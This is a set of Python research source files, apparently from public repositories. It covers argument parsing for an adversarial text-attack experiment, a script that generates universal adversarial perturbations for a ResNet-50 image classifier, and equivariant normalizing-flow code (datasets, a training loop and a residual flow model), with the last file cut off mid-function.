help='generator architecture (MLP)')
padd('--arch_d', type=str, default='300-300',
help='critic/discriminator architecture (MLP)')
padd('--arch_conv_filters', type=str, default='500-700-1000',
help='encoder filter sizes for different convolutional layers')
padd('--arch_conv_strides', type=str, default='1-2-2',
help='encoder strides for different convolutional layers')
padd('--arch_conv_windows', type=str, default='3-3-3',
help='encoder window sizes for different convolutional layers')
padd('--z_size', type=int, default=100,
help='dimension of random noise z to feed into generator')
padd('--temp', type=float, default=1,
help='softmax temperature (lower --> more discrete)')
padd('--enc_grad_norm', type=bool, default=True,
help='norm code gradient from critic->encoder')
padd('--train_emb', type=bool, default=True,
help='Train Glove Embeddings')
padd('--gan_toenc', type=float, default=-0.01,
help='weight factor passing gradient from gan to encoder')
padd('--dropout', type=float, default=0.0,
help='dropout applied to layers (0 = no dropout)')
padd('--useJS', type=bool, default=True,
help='use Jenson Shannon distance')
padd('--perturb_z', type=bool, default=True,
help='perturb noise space z instead of hidden c')
padd('--max_seq_len', type=int, default=200,
help='max_seq_len')
padd('--gamma', type=float, default=0.95,
help='Discount Factor')
padd('--model', type=str, default="lstm_arch",
help='classification model name')
padd('--distance_func', type=str, default="cosine",
help='NN distance function')
padd('--hidden_dim', type=int, default=128,
help='hidden_dim')
padd('--burn_in', type=int, default=500,
help='Train VAE burnin')
padd('--beta', type=float, default=0.,
help='Entropy reg')
padd('--embedding_training', type=bool, default=False,
help='embedding_training')
padd('--convolution_enc', action='store_true', default=False,
help='use convolutions in encoder')
padd('--seqgan_reward', action='store_true', default=False,
help='use seq gan reward')
padd('--train_classifier', action='store_true', default=False,
help='Train Classifier from scratch')
padd('--diff_nn', action='store_true', default=False,
help='Backprop through Nearest Neighbors')
# Bells
padd('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
padd('--no_parallel', action='store_true', default=False,
help="Don't use multiple GPUs")
padd('--save_adv_samples', action='store_true', default=False,
help='Write adversarial samples to disk')
padd('--nearest_neigh_all', action='store_true', default=False,
help='Evaluate near. neig. for whole evaluation set')
padd("--comet", action="store_true", default=False,
help='Use comet for logging')
padd("--offline_comet", action="store_true", default=False,
help='Use comet offline. To upload, after training run: comet-upload file.zip')
padd("--comet_username", type=str, default="joeybose",
help='Username for comet logging')
padd("--comet_apikey", type=str,\
default="<KEY>",help='Api for comet logging')
padd('--debug', default=False, action='store_true',
help='Debug')
padd('--debug_neighbour', default=False, action='store_true',
help='Debug nearest neighbour training')
padd('--load_model', default=False, action='store_true',
help='Whether to load a checkpointed model')
padd('--save_model', default=False, action='store_true',
help='Whether to checkpoint the model')
padd('--model_path', type=str, default="saved_models/lstm_torchtext2.pt",\
help='where to save/load target model')
padd('--adv_model_path', type=str, default="saved_models/adv_model.pt",\
help='where to save/load adversarial')
padd('--no_load_embedding', action='store_false', default=True,
help='load Glove embeddings')
padd('--namestr', type=str, default='BMD Text', \
help='additional info in output filename to describe experiments')
padd('--dataset', type=str, default="imdb",help='dataset')
padd('--clip', type=float, default=1, help='gradient clipping, max norm')
padd('--use_glove', type=str, default="true",
help='Use GloVe embeddings ("true"/"false")')
args = parser.parse_args()
args.classes = 2
args.sample_file = "temp/adv_samples.txt"
use_cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
# Check if settings file
if os.path.isfile("settings.json"):
with open('settings.json') as f:
data = json.load(f)
args.comet_apikey = data["apikey"]
args.comet_username = data["username"]
# Prep file to save adversarial samples
if args.save_adv_samples:
now = datetime.datetime.now()
if os.path.exists(args.sample_file):
os.remove(args.sample_file)
with open(args.sample_file, 'w') as f:
f.write("Adversarial samples starting:\n{}\n".format(now))
# No set_trace ;)
if args.debug is False:
ipdb.set_trace = lambda: None
# Comet logging
args.device = torch.device("cuda" if use_cuda else "cpu")
if args.comet and not args.offline_comet:
experiment = Experiment(api_key=args.comet_apikey,
project_name="black-magic-design",
workspace=args.comet_username)
elif args.offline_comet:
offline_path = "temp/offline_comet"
if not os.path.exists(offline_path):
os.makedirs(offline_path)
from comet_ml import OfflineExperiment
experiment = OfflineExperiment(
project_name="black-magic-design",
workspace=args.comet_username,
offline_directory=offline_path)
# To upload offline comet, run: comet-upload file.zip
if args.comet or args.offline_comet:
experiment.set_name(args.namestr)
def log_text(self, msg):
# Change line breaks for html breaks
msg = msg.replace('\n','<br>')
self.log_html("<p>{}</p>".format(msg))
experiment.log_text = MethodType(log_text, experiment)
args.experiment = experiment
main(args)
```
#### File: BlackMagicDesign/NAG/generate_uap.py
```python
import os  # used by load_checkpoint below
import scipy
import scipy.misc  # used by imsave below
from model import *
from trainer import *
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
def load_checkpoint():
ckpt_dir = 'home/vkv/NAG/ckpt/'
print("[*] Loading model from {}".format(ckpt_dir))
filename = 'NAG' + '_ckpt.pth.tar'
ckpt_path = os.path.join(ckpt_dir, filename)
ckpt = torch.load(ckpt_path)
# load variables from checkpoint
model.load_state_dict(ckpt['state_dict'])
print("[*] Loaded {} checkpoint @ epoch {} with best valid acc of {:.3f}".format(
filename, ckpt['epoch'], ckpt['best_valid_acc']))
model = Generator().cuda()
net = choose_net('resnet50')
net = net.cuda()
load_checkpoint()
n=20
for i in range(n):
z = make_z((model.batch_size, model.z_dim ), minval=-1., maxval=1.)
z_ref = make_z((model.batch_size, model.z_dim ), minval=-1., maxval=1.)
pert = model(z_ref, z)
pert = pert.cpu().numpy()
pert = np.transpose(pert, (0,2,3,1))
np.save('perturbation' + str(i) + '.npy', pert[0])
scipy.misc.imsave('perturbation' + str(i) + '.png', pert[0])
print("{} {}".format(n, "perturbations saved"))
``` |
{
"source": "joeybose/Equivariant-Discrete-Flows",
"score": 3
} |
#### File: Equivariant-Discrete-Flows/data/point_cloud.py
```python
import os
import h5py
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
import torchvision.datasets as datasets
import torchvision.transforms as transforms
class SpatialMNIST(Dataset):
def __init__(self, data_dir, train):
super(SpatialMNIST, self).__init__()
self.data = datasets.MNIST(data_dir, train=train, download=True, transform=transforms.ToTensor())
self.grid = np.stack(np.meshgrid(range(28), range(27,-1,-1)), axis=-1).reshape([-1,2])
def __getitem__(self, idx):
img, _ = self.data[idx]
img = img.numpy().reshape([-1])
p = img / img.sum()
replace = True if (sum(p > 0) < 50) else False
ind = np.random.choice(784, 50, p=p, replace=replace)
x = self.grid[ind].copy().astype(np.float32)
x += np.random.uniform(0., 1., (50, 2))
# normalize
x /= 28. # [0, 1]
return x
def __len__(self):
return len(self.data)
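# Usage sketch (assumed paths/args): each item is a (50, 2) point cloud normalized to [0, 1);
# wrap with torch.utils.data.DataLoader, e.g.
#   loader = DataLoader(SpatialMNIST('./data', train=True), batch_size=64, shuffle=True)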
class ModelNet(Dataset):
NUM_POINTS = 10000
label_dict = {'airplane': 0,
'bathtub': 1,
'bed': 2,
'bench': 3,
'bookshelf': 4,
'bottle': 5,
'bowl': 6,
'car': 7,
'chair': 8,
'cone': 9,
'cup': 10,
'curtain': 11,
'desk': 12,
'door': 13,
'dresser': 14,
'flower_pot': 15,
'glass_box': 16,
'guitar': 17,
'keyboard': 18,
'lamp': 19,
'laptop': 20,
'mantel': 21,
'monitor': 22,
'night_stand': 23,
'person': 24,
'piano': 25,
'plant': 26,
'radio': 27,
'range_hood': 28,
'sink': 29,
'sofa': 30,
'stairs': 31,
'stool': 32,
'table': 33,
'tent': 34,
'toilet': 35,
'tv_stand': 36,
'vase': 37,
'wardrobe': 38,
'xbox': 39,
}
def __init__(self, data_dir, category, set_size, train):
super(ModelNet, self).__init__()
with h5py.File(data_dir, 'r') as f:
train_cloud = np.array(f['tr_cloud'])
train_labels = np.array(f['tr_labels'])
test_cloud = np.array(f['test_cloud'])
test_labels = np.array(f['test_labels'])
if train:
data = train_cloud
label = train_labels
else:
data = test_cloud
label = test_labels
if category != 'all':
assert category in ModelNet.label_dict
inds = np.where(label == ModelNet.label_dict[category])[0]
data = data[inds]
label = label[inds]
self.data = data
self.set_size = set_size
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
x = self.data[idx]
# subsample
sel = np.random.choice(x.shape[0], self.set_size, replace=False)
x = x[sel]
# preprocess
x += np.random.randn(*x.shape) * 0.001
x_max = np.max(x)
x_min = np.min(x)
x = (x - x_min) / (x_max - x_min)
x -= np.mean(x, axis=0)
return x
# def get_loader(args):
# if args.data == 'spatial_mnist':
# trainset = SpatialMNIST(args.data_dir, True)
# testset = SpatialMNIST(args.data_dir, False)
# elif args.data == 'modelnet':
# trainset = ModelNet(args.data_dir, args.category, args.set_size, True)
# testset = ModelNet(args.data_dir, args.category, args.set_size, False)
# else:
# raise Exception()
# trainloader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
# testloader = DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=2)
# return trainloader, testloader
```
#### File: joeybose/Equivariant-Discrete-Flows/energy.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import optim
from torch.utils.data import DataLoader, TensorDataset
import sklearn.datasets as datasets
import math
import os
import time
import argparse
import pprint
from functools import partial
import ipdb
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import cm
from tqdm import tqdm
# from utils import utils
# from utils.utils import seed_everything, str2bool, visualize_transform
from utils.utils import *
from data import create_dataset
from data.toy_data import sample_2d_data
from flows import create_flow
from e2cnn import gspaces
from e2cnn import nn as enn
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def test(args, epoch, flow, whole_data, test_data_iter, prior):
flow.update_lipschitz(200)
holdout_nll = 0
with torch.no_grad():
flow.eval()
for it, batch_idxs in enumerate(test_data_iter):
if it > 100:
break
x = torch.Tensor(whole_data[batch_idxs]).cuda()
test_loss, test_logpz, test_delta_logp = flow.log_prob(inputs=x, prior=prior)
# z, delta_logp = flow(x, inverse=True)
# nll = (prior.energy(z).view(-1) + delta_logp.view(-1)).mean()
print("\r{}".format(it), test_loss.item(), end="")
holdout_nll += test_loss.item()
holdout_nll = holdout_nll / (it + 1)
print(
'[TEST] Iter {:04d} | Test NLL {:.6f} '.format(
epoch, holdout_nll
)
)
flow.train()
def train_flow(args, flow, optimizer):
time_meter = RunningAverageMeter(0.93)
loss_meter = RunningAverageMeter(0.93)
logpz_meter = RunningAverageMeter(0.93)
delta_logp_meter = RunningAverageMeter(0.93)
end = time.time()
flow.train()
data_smaller, whole_data, train_data_iter, test_data_iter, prior = create_dataset(args, args.dataset)
# if args.use_whole_data:
# data = torch.tensor(whole_data, dtype=torch.float32, device=args.dev)
# else:
# data = torch.tensor(data_smaller, dtype=torch.float32, device=args.dev)
for i in range(args.num_iters):
for it, idx in enumerate(train_data_iter):
data = torch.tensor(whole_data[idx], dtype=torch.float32,
device=args.dev)
optimizer.zero_grad()
beta = min(1, i / args.annealing_iters) if args.annealing_iters > 0 else 1.  # anneal beta over outer iterations
loss, logpz, delta_logp = flow.log_prob(inputs=data, prior=prior)
try:
if len(logpz) > 0:
logpz = torch.mean(logpz)
delta_logp = torch.mean(delta_logp)
except:
pass
# loss = -flow.log_prob(inputs=data).mean()
loss_meter.update(loss.item())
logpz_meter.update(logpz.item())
delta_logp_meter.update(delta_logp.item())
loss.backward()
# grad_norm = torch.nn.utils.clip_grad.clip_grad_norm_(flow.parameters(), 1.)
optimizer.step()
if 'resflow' in args.model_type:
flow.beta = beta
flow.update_lipschitz(args.n_lipschitz_iters)
if args.learn_p and i > args.annealing_iters: flow.compute_p_grads()
time_meter.update(time.time() - end)
print(
'Iter {:04d} | Time {:.4f}({:.4f}) | Loss {:.6f}({:.6f})'
' | Logp(z) {:.6f}({:.6f}) | DeltaLogp {:.6f}({:.6f})'.format(
i+1, time_meter.val, time_meter.avg, loss_meter.val, loss_meter.avg, logpz_meter.val, logpz_meter.avg,
delta_logp_meter.val, delta_logp_meter.avg
)
)
if (i + 1) % args.test_interval == 0 or (i + 1) == args.num_iters:
test(args, i, flow, whole_data, test_data_iter, prior)
# ipdb.set_trace()
if (i + 1) % args.log_interval == 0 and args.plot:
print("Log Likelihood at %d is %f" %(i+1, loss))
flow.update_lipschitz(200)
with torch.no_grad():
flow.eval()
p_samples = sample_2d_data(args.dataset, 400)
# sample_fn, density_fn = flow.flow_model.inverse, flow.flow_model.forward
sample_fn, density_fn = None, flow.flow_model.forward
plt.figure(figsize=(9, 3))
visualize_transform(
p_samples, torch.randn, flow.standard_normal_logprob, transform=sample_fn, inverse_transform=density_fn,
samples=True, npts=100, device=args.dev
)
plt.savefig('figures/E_figures/{}_{}.png'.format(args.plot_name, str(i+1)))
plt.close()
flow.train()
end = time.time()
def main(args):
# args.input_size = (args.batch_size, 1, 1, args.input_dim)
args.input_size = (args.batch_size, args.nc, 1, args.input_dim)
flow = create_flow(args, args.model_type)
print("Number of trainable parameters: {}".format(count_parameters(flow)))
# optimizer = optim.Adam(flow.parameters(), lr=args.lr, weight_decay=args.weight_decay)
optimizer = optim.AdamW(flow.parameters(), lr=args.lr, amsgrad=True, weight_decay=args.weight_decay)
train_flow(args, flow, optimizer)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# boiler plate inits
parser.add_argument('--plot', action='store_true', help='Plot a flow and target density.')
parser.add_argument('--cuda', type=int, help='Which GPU to run on.')
parser.add_argument('--seed', type=int, default=0, help='Random seed.')
parser.add_argument('--num_iters', type=int, default=500)
parser.add_argument('--plot_name', type=str, default='test')
# target density
parser.add_argument('--model_type', type=str, default="Toy", help='Which Flow to use.')
parser.add_argument('--dataset', type=str, default=None, help='Which potential function to approximate.')
# parser.add_argument('--nsamples', type=int, default=500, help='Number of Samples to Use')
# model parameters
parser.add_argument('--input_size', type=int, default=2, help='Dimension of the data.')
parser.add_argument('--input_dim', type=int, default=2, help='Dimension of the data.')
parser.add_argument('--nc', type=int, default=1, help='Num channels.')
parser.add_argument('--hidden_dim', type=int, default=32, help='Dimensions of hidden layers.')
parser.add_argument('--num_layers', type=int, default=1, help='Number of hidden layers.')
parser.add_argument('--n_blocks', type=str, default='1')
# i-Resnet params
parser.add_argument('--coeff', type=float, default=0.9)
parser.add_argument('--vnorms', type=str, default='222222')
parser.add_argument('--n-lipschitz-iters', type=int, default=100)
parser.add_argument('--atol', type=float, default=None)
parser.add_argument('--rtol', type=float, default=None)
parser.add_argument('--learn-p', type=eval, choices=[True, False], default=False)
parser.add_argument('--mixed', type=eval, choices=[True, False], default=True)
parser.add_argument('--mean-free-prior', type=eval, choices=[True, False], default=False)
parser.add_argument('--beta', type=float, default=1.0)
parser.add_argument('--dims', type=str, default='128-128-128-128')
parser.add_argument('--act', type=str, default='swish')
parser.add_argument('--group', type=str, default='fliprot4', help='The choice of group representation for Equivariance')
parser.add_argument('--out-fiber', type=str, default='regular')
parser.add_argument('--field-type', type=int, default=0, help='Only For Continuous groups. Picks the frequency.')
parser.add_argument('--kernel_size', type=int, default=3)
parser.add_argument('--realnvp-padding', type=int, default=1)
parser.add_argument('--brute-force', type=eval, choices=[True, False], default=False)
parser.add_argument('--actnorm', type=eval, choices=[True, False], default=False)
parser.add_argument('--batchnorm', type=eval, choices=[True, False], default=False)
parser.add_argument('--exact-trace', type=eval, choices=[True, False], default=False)
parser.add_argument('--n-power-series', type=int, default=None)
parser.add_argument('--n-dist', choices=['geometric', 'poisson'], default='geometric')
# training parameters
parser.add_argument('--use_whole_data', type=eval, choices=[True, False], default=False)
parser.add_argument('--log_interval', type=int, default=10, help='How often to save model and samples.')
parser.add_argument('--test_interval', type=int, default=500, help='How often to save model and samples.')
parser.add_argument('--batch_size', type=int, default=128)
parser.add_argument('--test_batch_size', type=int, default=10000)
parser.add_argument('--lr', type=float, default=5e-3)
parser.add_argument('--weight-decay', type=float, default=1e-5)
parser.add_argument('--annealing-iters', type=int, default=0)
args = parser.parse_args()
''' Fix Random Seed '''
seed_everything(args.seed)
# Check if settings file
args.dev = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
project_name = project_name(args.dataset)
main(args)
```
#### File: Equivariant-Discrete-Flows/flows/equivariant_resflow.py
```python
import numpy as np
import torch
import torch.nn as nn
import math
from nflows.distributions.normal import StandardNormal
from nflows.distributions.uniform import BoxUniform
from e2cnn import gspaces
from e2cnn import nn as enn
from utils import utils
import flows.layers.base as base_layers
import flows.layers as layers
from flows.flow_utils import *
from torch.distributions.multivariate_normal import MultivariateNormal
from flows.distributions import HypersphericalUniform
import ipdb
ACT_FNS = {
'relu': enn.ReLU,
'elu': enn.ELU,
'gated': enn.GatedNonLinearity1,
'swish': base_layers.GeomSwish,
}
GROUPS = {
'fliprot16': gspaces.FlipRot2dOnR2(N=16),
'fliprot12': gspaces.FlipRot2dOnR2(N=12),
'fliprot8': gspaces.FlipRot2dOnR2(N=8),
'fliprot4': gspaces.FlipRot2dOnR2(N=4),
'fliprot2': gspaces.FlipRot2dOnR2(N=2),
'flip': gspaces.Flip2dOnR2(),
'rot16': gspaces.Rot2dOnR2(N=16),
'rot12': gspaces.Rot2dOnR2(N=12),
'rot8': gspaces.Rot2dOnR2(N=8),
'rot4': gspaces.Rot2dOnR2(N=4),
'rot2': gspaces.Rot2dOnR2(N=2),
'so2': gspaces.Rot2dOnR2(N=-1, maximum_frequency=10),
'o2': gspaces.FlipRot2dOnR2(N=-1, maximum_frequency=10),
}
FIBERS = {
"trivial": trivial_fiber,
"quotient": quotient_fiber,
"regular": regular_fiber,
"irrep": irrep_fiber,
"mixed1": mixed1_fiber,
"mixed2": mixed2_fiber,
}
def standard_normal_logprob(z):
logZ = -0.5 * math.log(2 * math.pi)
return logZ - z.pow(2) / 2
def add_padding(args, x, nvals=256):
# Theoretically, padding should've been added before the add_noise preprocessing.
# nvals takes into account the preprocessing before padding is added.
if args.padding > 0:
if args.padding_dist == 'uniform':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).uniform_()
logpu = torch.zeros_like(u).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
elif args.padding_dist == 'gaussian':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).normal_(nvals / 2, nvals / 8)
logpu = normal_logprob(u, nvals / 2, math.log(nvals / 8)).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
else:
raise ValueError()
else:
return x, torch.zeros(x.shape[0], 1).to(x)
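# Note: the returned `logpu` is the log-density of the padding noise; it is subtracted
# from log p(x) later (see log_prob below) so the padded dimensions do not inflate the
# model's likelihood.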
class EquivariantResidualFlow(nn.Module):
def __init__(
self,
args,
input_size,
n_blocks=[16, 16],
intermediate_dim=32,
factor_out=True,
quadratic=False,
init_layer=None,
actnorm=False,
fc_actnorm=False,
batchnorm=False,
dropout=0,
fc=False,
coeff=0.9,
vnorms='122f',
n_lipschitz_iters=None,
sn_atol=None,
sn_rtol=None,
n_power_series=None,#5,
n_dist='geometric',
n_samples=1,
kernels='3-1-3',
activation_fn='elu',
fc_end=False,
fc_idim=128,
n_exact_terms=0,
preact=False,
neumann_grad=True,
grad_in_forward=True,
first_resblock=False,
learn_p=False,
classification=False,
classification_hdim=64,
n_classes=10,
block_type='resblock',
group_action_type=None,
):
super(EquivariantResidualFlow, self).__init__()
self.args = args
self.n_scale = min(len(n_blocks), self._calc_n_scale(input_size))
_, self.c, self.h, self.w = input_size[:]
self.n_blocks = n_blocks
self.intermediate_dim = intermediate_dim
self.factor_out = factor_out
self.quadratic = quadratic
self.init_layer = init_layer
self.actnorm = actnorm
self.fc_actnorm = fc_actnorm
self.batchnorm = batchnorm
self.dropout = dropout
self.fc = fc
self.coeff = coeff
self.vnorms = vnorms
self.n_lipschitz_iters = n_lipschitz_iters
self.sn_atol = sn_atol
self.sn_rtol = sn_rtol
self.n_power_series = n_power_series
self.n_dist = n_dist
self.n_samples = n_samples
self.kernels = kernels
self.fc_end = fc_end
self.fc_idim = fc_idim
self.n_exact_terms = n_exact_terms
self.preact = preact
self.neumann_grad = neumann_grad
self.grad_in_forward = grad_in_forward
self.first_resblock = first_resblock
self.learn_p = learn_p
self.classification = classification
self.classification_hdim = classification_hdim
self.n_classes = n_classes
self.block_type = block_type
if not self.n_scale > 0:
raise ValueError('Could not compute number of scales for input of size (%d,%d,%d,%d)' % input_size)
self.activation_fn = ACT_FNS[activation_fn]
self.group_action_type = GROUPS[args.group]
self.out_fiber = args.out_fiber
self.field_type = args.field_type
self.group_card = len(list(self.group_action_type.testing_elements))
self.input_type = enn.FieldType(self.group_action_type, self.c*[self.group_action_type.trivial_repr])
self.transforms = self._build_net(input_size)
self.dims = [o[1:] for o in self.calc_output_size(input_size)]
self.uniform_prior = BoxUniform(torch.tensor([0.0]).to(args.dev),
torch.tensor([1.0]).to(args.dev))
# self.prior = MultivariateNormal(torch.zeros(2).cuda(),
# torch.eye(2).cuda())
self.prior = HypersphericalUniform(dim=self.c*self.h*self.w,
device=args.dev)
if self.classification:
self.build_multiscale_classifier(input_size)
def _build_net(self, input_size):
_, c, h, w = input_size
transforms = []
_stacked_blocks = StackediResBlocks
in_type = self.input_type
my_i_dims = self.intermediate_dim
out_type = FIBERS[self.out_fiber](self.group_action_type, my_i_dims,
self.field_type, fixparams=True)
for i in range(self.n_scale):
transforms.append(
_stacked_blocks(
in_type,
out_type,
self.group_action_type,
initial_size=(c, h, w),
idim=my_i_dims,
squeeze=False, #Can't change channels/fibers
init_layer=self.init_layer if i == 0 else None,
n_blocks=self.n_blocks[i],
quadratic=self.quadratic,
actnorm=self.actnorm,
fc_actnorm=self.fc_actnorm,
batchnorm=self.batchnorm,
dropout=self.dropout,
fc=self.fc,
coeff=self.coeff,
vnorms=self.vnorms,
n_lipschitz_iters=self.n_lipschitz_iters,
sn_atol=self.sn_atol,
sn_rtol=self.sn_rtol,
n_power_series=self.n_power_series,
n_dist=self.n_dist,
n_samples=self.n_samples,
kernels=self.kernels,
activation_fn=self.activation_fn,
fc_end=self.fc_end,
fc_idim=self.fc_idim,
n_exact_terms=self.n_exact_terms,
preact=self.preact,
neumann_grad=self.neumann_grad,
grad_in_forward=self.grad_in_forward,
first_resblock=self.first_resblock and (i == 0),
learn_p=self.learn_p,
)
)
c, h, w = c * 2 if self.factor_out else c * 4, h // 2, w // 2
print("C: %d H: %d W: %d" %(c, h ,w))
if i == self.n_scale - 1:
out_type = enn.FieldType(self.group_action_type, self.c*[self.group_action_type.trivial_repr])
return nn.ModuleList(transforms)
def _calc_n_scale(self, input_size):
_, _, h, w = input_size
n_scale = 0
while h >= 4 and w >= 4:
n_scale += 1
h = h // 2
w = w // 2
return n_scale
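# Example: a 28x28 input gives n_scale = 3 (28 -> 14 -> 7 -> 3, stopping once a side < 4).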
def calc_output_size(self, input_size):
n, c, h, w = input_size
if not self.factor_out:
k = self.n_scale - 1
return [[n, c * 4**k, h // 2**k, w // 2**k]]
output_sizes = []
for i in range(self.n_scale):
if i < self.n_scale - 1:
c *= 2
h //= 2
w //= 2
output_sizes.append((n, c, h, w))
else:
output_sizes.append((n, c, h, w))
return tuple(output_sizes)
def build_multiscale_classifier(self, input_size):
n, c, h, w = input_size
hidden_shapes = []
for i in range(self.n_scale):
if i < self.n_scale - 1:
c *= 2 if self.factor_out else 4
h //= 2
w //= 2
hidden_shapes.append((n, c, h, w))
classification_heads = []
feat_type_out = FIBERS['regular'](self.group_action_type,
self.classification_hdim,
self.field_type, fixparams=True)
feat_type_mid = FIBERS['regular'](self.group_action_type,
int(self.classification_hdim // 2),
self.field_type, fixparams=True)
feat_type_last = FIBERS['regular'](self.group_action_type,
int(self.classification_hdim // 4),
self.field_type, fixparams=True)
# feat_type_out = enn.FieldType(self.group_action_type,
# self.classification_hdim*[self.group_action_type.regular_repr])
for i, hshape in enumerate(hidden_shapes):
classification_heads.append(
nn.Sequential(
enn.R2Conv(self.input_type, feat_type_out, 5, stride=2),
layers.EquivariantActNorm2d(feat_type_out.size),
enn.ReLU(feat_type_out, inplace=True),
enn.PointwiseAvgPoolAntialiased(feat_type_out, sigma=0.66, stride=2),
enn.R2Conv(feat_type_out, feat_type_mid, kernel_size=3),
layers.EquivariantActNorm2d(feat_type_mid.size),
enn.ReLU(feat_type_mid, inplace=True),
enn.PointwiseAvgPoolAntialiased(feat_type_mid, sigma=0.66, stride=1),
enn.R2Conv(feat_type_mid, feat_type_last, kernel_size=3),
layers.EquivariantActNorm2d(feat_type_last.size),
enn.ReLU(feat_type_last, inplace=True),
enn.PointwiseAvgPoolAntialiased(feat_type_last, sigma=0.66, stride=2),
enn.GroupPooling(feat_type_last),
)
)
self.classification_heads = nn.ModuleList(classification_heads)
self.logit_layer = nn.Linear(classification_heads[-1][-1].out_type.size, self.n_classes)
def check_equivariance(self, r2_act, out_type, data, func, data_type=None):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
for g in r2_act.testing_elements:
output = func(data)
rg_output = enn.GeometricTensor(output.tensor.view(-1, c, h, w).cpu(),
out_type).transform(g)
data = enn.GeometricTensor(data.tensor.view(-1, c, h, w).cpu(), input_type)
x_transformed = enn.GeometricTensor(data.transform(g).tensor.view(-1, c, h, w).cuda(), input_type)
output_rg = func(x_transformed)
# Equivariance Condition
output_rg = enn.GeometricTensor(output_rg.tensor.cpu(), out_type)
data = enn.GeometricTensor(data.tensor.squeeze().view(-1, c, h , w).cuda(), input_type)
assert torch.allclose(rg_output.tensor.cpu().squeeze(), output_rg.tensor.squeeze(), atol=1e-5), g
print("Passed Equivariance Test")
def check_invariant_log_prob(self, r2_act, out_type, data, data_type=None):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
data = enn.GeometricTensor(data.view(-1, c, h, w).cpu(), input_type).to(self.args.dev)
for g in r2_act.testing_elements:
output = self.log_prob(self.args, data.tensor)
data = enn.GeometricTensor(data.tensor.view(-1, c, h, w).cpu(), input_type)
x_transformed = enn.GeometricTensor(data.transform(g).tensor.cpu().view(-1, c, h, w).cuda(), input_type)
output_rg = self.log_prob(self.args, x_transformed.tensor)
# Equivariance Condition
data = enn.GeometricTensor(data.tensor.squeeze().view(-1, c, h , w).cuda(), input_type)
diff = torch.exp(output.squeeze()) - torch.exp(output_rg.squeeze())
avg_norm_diff = torch.norm(diff, p='fro', dim=-1).mean()
print("Avg Norm Diff: %f | G: %d" %(avg_norm_diff, g))
assert torch.allclose(torch.exp(output.squeeze()), torch.exp(output_rg.squeeze()), atol=1e-5), g
print("Passed E-Resflow Invariance Test")
def forward(self, x_in, logpx=None, inverse=False, classify=False):
x = enn.GeometricTensor(x_in.view(-1, self.c, self.h, self.w), self.input_type)
if inverse:
return self.inverse(x, logpx)
out = []
if classify: class_outs = []
for idx in range(len(self.transforms)):
if logpx is not None:
# self.check_equivariance(self.group_action_type, self.input_type,
# x, self.transforms[idx])
x, logpx = self.transforms[idx].forward(x, logpx)
else:
x = self.transforms[idx].forward(x)
if self.factor_out and (idx < len(self.transforms) - 1):
d = x.size(1) // 2
x, f = x[:, :d], x[:, d:]
out.append(f)
# Handle classification.
if classify:
if self.factor_out:
class_outs.append(self.classification_heads[idx](f).tensor)
else:
class_outs.append(self.classification_heads[idx](x).tensor)
out.append(x.tensor.squeeze())
out = torch.cat([o.view(o.size()[0], -1) for o in out], 1)
output = out if logpx is None else (out, logpx)
if classify:
h = torch.cat(class_outs, dim=1).squeeze(-1).squeeze(-1)
logits = self.logit_layer(h)
return output, logits
else:
return output
def inverse(self, z, logpz=None):
if self.factor_out:
z = z.view(z.shape[0], -1)
zs = []
i = 0
for dims in self.dims:
s = np.prod(dims)
zs.append(z[:, i:i + s])
i += s
zs = [_z.view(_z.size()[0], *zsize) for _z, zsize in zip(zs, self.dims)]
if logpz is None:
z_prev = self.transforms[-1].inverse(zs[-1])
for idx in range(len(self.transforms) - 2, -1, -1):
z_prev = torch.cat((z_prev, zs[idx]), dim=1)
z_prev = self.transforms[idx].inverse(z_prev)
return z_prev
else:
z_prev, logpz = self.transforms[-1].inverse(zs[-1], logpz)
for idx in range(len(self.transforms) - 2, -1, -1):
z_prev = torch.cat((z_prev, zs[idx]), dim=1)
z_prev, logpz = self.transforms[idx].inverse(z_prev, logpz)
return z_prev, logpz
else:
# z = z.view(z.shape[0], *self.dims[-1])
for idx in range(len(self.transforms) - 1, -1, -1):
if logpz is None:
z = self.transforms[idx].inverse(z)
else:
z, logpz = self.transforms[idx].inverse(z, logpz)
z = z.tensor.squeeze()
return z if logpz is None else (z, logpz)
def check_invertibility(self, args, x):
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
x, logpu = add_padding(args, x, nvals)
z, delta_logp = self.forward(x.view(-1, *args.input_size[1:]), 0)
inv = self.forward(z.view(-1, *args.input_size[1:]), inverse=True)
atol_list = [1e-1, 1e-2, 1e-3, 1e-4, 1e-5]
        batch_size = x.shape[0]
        diff = x.view(batch_size, -1) - inv.view(batch_size, -1)
avg_norm_diff = torch.norm(diff, p='fro', dim=-1).mean()
if avg_norm_diff > 1 or torch.isnan(avg_norm_diff):
ipdb.set_trace()
inv = self.forward(z.view(-1, *args.input_size[1:]), inverse=True)
print("Avg Diff is %f" %(avg_norm_diff))
for atol in atol_list:
            res = torch.allclose(x, inv, atol=atol)
print("Invertiblity at %f: %s" %(atol, str(res)))
return avg_norm_diff
def log_prob(self, args, x, beta=1.0):
bits_per_dim, logits_tensor = torch.zeros(1).to(x), torch.zeros(args.n_classes).to(x)
logpz, delta_logp = torch.zeros(1).to(x), torch.zeros(1).to(x)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
